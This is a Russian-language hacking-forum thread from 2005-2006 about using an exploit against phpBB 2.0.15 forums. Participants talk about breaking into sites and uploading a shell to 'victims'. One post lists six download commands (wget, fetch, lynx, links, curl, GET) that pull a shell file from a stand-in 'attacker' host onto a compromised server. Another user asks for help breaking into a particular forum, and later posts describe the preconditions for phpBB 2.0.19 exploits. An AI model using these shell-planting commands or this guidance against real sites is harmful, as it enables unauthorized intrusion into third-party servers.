Форумы Эксплоит для phpbb 2.0.15

Discussion in 'Уязвимости CMS/форумов' started by KLez, 30 Jun 2005.

  1. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    936
    Likes Received:
    396
    Reputations:
    261
    Не понял что получилось?
     
  2. DR@G

    DR@G Banned

    Joined:
    26 Apr 2005
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    Форум хакнуть =))
    Скинь нам видео с SK | Heaton'om на вебфайл и скажи пасс от него =))
     
  3. /W0W3/s

    /W0W3/s HarD CorE

    Joined:
    18 Jun 2005
    Messages:
    646
    Likes Received:
    212
    Reputations:
    85
    я уже вчера получил и просмотрел =)) у него почти получилось. Просто он не смог залить шелл.. Ну это уже кому как повезет с жертвой =))
     
  4. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    слушайте а нах вам шелл заливать?кто качал последний выпуск езина от Мазы тот знает что там лежит измененный сплойт для пхпбб 2.0.15 и очень отлично работает и прост в управлении..
     
  5. uboHEX

    uboHEX New Member

    Joined:
    4 Jul 2005
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Народ, хоть тресни не могу понять как скачать или залить файл с\на сервер. Не могу составить запрос wget`ом. Помогите плиз.
     
  6. mamont

    mamont New Member

    Joined:
    30 Jan 2005
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    хм я ощущаю себя маленькой собачкой которой показали вкусный кусок мяса а потом подвесили на прилачно расстоянии да так что мне до него не подпрыгнуть !!!=(

    Вот сижу облизываюсь и хочу всех убить !!!!!!!!!!
     
  7. /W0W3/s

    /W0W3/s HarD CorE

    Joined:
    18 Jun 2005
    Messages:
    646
    Likes Received:
    212
    Reputations:
    85
    mamont, но но !!!
     
  8. KLez

    KLez r00t

    Joined:
    17 May 2005
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    2 mamont Ну что ты не понимаешь ТО??? Тебе дали сплоит вот и юзай .
     
  9. mamont

    mamont New Member

    Joined:
    30 Jan 2005
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    вопервых я не могу создать для него среду по некоторым приченам =(
    а биплатного шела вот неделю не могу найти чбы wget хотябы работал =(

    может кто подскажет сайтик где халява на шелл ????
     
  10. ProTeuS

    ProTeuS --

    Joined:
    26 Nov 2004
    Messages:
    1,239
    Likes Received:
    542
    Reputations:
    445
    дааа, с wget'ом траблемка-то вышла...у меня тоже не заработал :(
     
  11. t4k

    t4k New Member

    Joined:
    6 Jul 2005
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Так может там просто не wget стоит, а например feetch или curl? :)
     
  12. Xalegi

    Xalegi Elder - Старейшина

    Joined:
    24 Nov 2004
    Messages:
    109
    Likes Received:
    4
    Reputations:
    6
    верняк... сначала посмотрите какая качалка стоит.. потом права куда скачиваете.. и всё тип-топ =)
     
  13. tester2005

    tester2005 Elder - Старейшина

    Joined:
    17 Jan 2005
    Messages:
    38
    Likes Received:
    2
    Reputations:
    0
    Млииин ну вы даете, трудно почитать книжек, мануалов чтоль.......
    Вот споссобы закачек, еси один не работает то заработает другой

    метод wget:
    wget http://attacker/shellfile -o /папка

    метод fetch:
    fetch -p http://attacker/shellfile -o /папка

    метод lynx:
    lynx -source http://attacker/shellfile > /папка

    метод links:
    links -source http://attacker/shellfile > /папка

    метод curl:
    curl http://attacker/shellfile -o /папка

    метод GET:
    GET http://attacker/shellfile > /папка
     
  14. ph0en1x

    ph0en1x Elder - Старейшина

    Joined:
    14 Jun 2006
    Messages:
    29
    Likes Received:
    2
    Reputations:
    0
    Перепробовал все описаные способы нифига не получилось. :( может просто руки кривые.
    Помогите взломать http://в просьбы о взломах/forum/.
     
    #54 ph0en1x, 1 Jul 2006
    Last edited by a moderator: 3 Jul 2006
  15. Voyageur

    Voyageur Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    67
    Likes Received:
    10
    Reputations:
    1
    ph0en1x, если судить по тесту на определение версии, то форум принадлежит к 2.0.19, а не 2.0.15. Тогда тебе в поиск, там был эксплоит, правда он даалееекоо не везде работает.
    ЗЫ Если удастся взломать его - дай мне знать, сколько не бьюсь над 19-м - нифига не получается :(
     
  16. bandera

    bandera Banned

    Joined:
    2 Jun 2006
    Messages:
    58
    Likes Received:
    37
    Reputations:
    11
    А чо над ним биться то, всё равно ничего не получится. Ну только если у тебя есть логин и пасс админа или на форуме стоит мод смены стиля форума с главной страницы.

    Есть два сплойта к 19.
    Один: для выполнения команд если имеем логин и пасс админа.
    Второй (наверное тот который ты имел ввиду): реализовать уязвимость можно только на форумах где стоит мод смены стиля форума с главной страницы (таких не очень много).
     
    #56 bandera, 1 Jul 2006
    Last edited: 1 Jul 2006
  17. Voyageur

    Voyageur Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    67
    Likes Received:
    10
    Reputations:
    1
    bandera, ну это я знаю. Там же вроде xss была? Не бывает такого, что взломать нельзя. Особенно у phpBB :)